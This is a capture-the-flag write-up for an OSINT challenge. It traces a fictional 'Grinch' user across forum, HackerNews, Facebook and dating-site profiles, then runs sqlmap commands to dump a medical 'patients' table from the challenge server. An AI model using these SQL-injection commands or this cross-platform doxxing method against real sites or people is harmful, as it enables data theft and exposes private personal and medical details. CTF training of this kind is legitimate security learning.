Dox the Grinch

Authors: Milkdrop, PinkiePie1189

(OSINT Challenge) aka (Open-source intelligence Challenge)

Description of Challenge:

Here a Guy posted the he hates Christmas and now we need to find his name, Surname, City, Favorite Color, Blood Type and his height (which is respectively the flag for the ctf)
Lets start by following the URL

https://notabug.io/t/whatever/comments/44530e6b7740f22940db9c176b621900d0bce697/i-hate-xmas

Here you can see a post

it was Posted by a user : Domay1986

now lets click on the username and see what else has he posted Or Submitted in this case

here you can see he has another post about HackerNews

lets follow the post, you can see

Hmmm

he made a HackerNews account so lets go to google and search HackerNews

Lets go to

https://news.ycombinator.com/

We can see a lot of post there

Now how can we find this guy?

first I clicked on a user name of a random user

Doppp for an instance

it redirected to https://news.ycombinator.com/user?id=doppp

Then I replaced the id with Domay1986 which was the poster and the person we were supposed to find

https://news.ycombinator.com/user?id=Domay1986

Cool we found the User

here we can see his name is Eugene

Now, we got his name where do we get other stuffs???

in https://notabug.io/user/uIUP3NZDQVnKkISlVdjM0cSOwt_5EKu1g3CzQGmtTSc.VlYirh-sCV0rZ_6px0em8HWyeKZN8TMnTtY2l0YtoTA

on overview you can see a post

He mentioned that he has a Facebook account

now lets search for his Facebook account

I gave a lot of try but the one that worked for me was

searching with Eugene (domay)

why Eugene (domay)
Eugene was his first name and in this case Domay1986 was his alliance so in facebook if you search for a person who has a nickname too you use () brackets and put in the nickname for the person

Put it in the search bar,

Then search for the person, there you go you found the guy

Lets check his posts,

Eugene Clarke is his full name.

now lets look for all his posts

Scrolling down you will see a post

hmm lets check the website we could get more info about him

here it redirects you to http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?fbclid=IwAR3cBJGwGQMAyyDWDHSiI1LTTqKlt-r1JI6E-tdVrULRbK3G-lUtTlXDKsM

A database huh lets try sql injection here

type in ' in the search bar and hit search

Boom its SQLINJECTABLE

now lets use SQLMAP  to take out the DBS

i used the command

sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" --dbs

it resulted with 2 tables

Now lets check the ctf table

lets see what the database ctf holds

using the command

sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" -D ctf --tables

Now lets see all the data in the patients table

running

sqlmap -u "http://challs.xmas.htsp.ro:13002/23c12189dcu91n8uc198231c9n412c4189dsa/?id=" -D ctf -T patients --dump

you get

Since SQLMAP trims the data to see the data you need to go to

now

lets go to /root/.sqlmap/output/challs.xmas.htsp.ro/dump/ctf

you can see a csv file

now lets open that file I will use Text Editor for Kali linux

you can see a lot of data load

Now lets search for the name Eugene

here you go

2107,qxcxdoxmes62pwn5,EUGENE,Caucasian,M,162,110,2207 Kelly Ave PA 18508,CLARKE,1 April 1986,0-,Grinch Syndrome

For better view you can copy his patient ID qxcxdoxmes62pwn5 and search it in the website,

now we got his Name,Surname,Blood Type, Body Height

now all we need is his city and his favorite color.

for his city lets copy the address 2207 Kelly Ave PA 18508 and google the address

So the city is Scranton

now the only thing left to look for is his favorite color

lets go back to his facebook post and look at his latest post

lets maximize the image

you can see

Different tabs open in which Matrimoniale is one

lets search for that

since he has talked about romanian girls in his account, lets go to

matrimoniale.ro

for finding a user, the website uses https://www.matrimoniale.ro/thepersons name so lets search for domay1986

lets go to the url

https://www.matrimoniale.ro/domay1986

you will see

looking through all the tab i found Personal intresting lets go to that tab,

you can see

(scroll down a bit)

now we have all the information we need

Name: Eugene

Surname :Clarke

City: Scranton

Color: magenta

blood group: 0-

height: 162

combining and getting the flag as:

X-MAS{eugene_clarke_scranton_magenta_0-_162}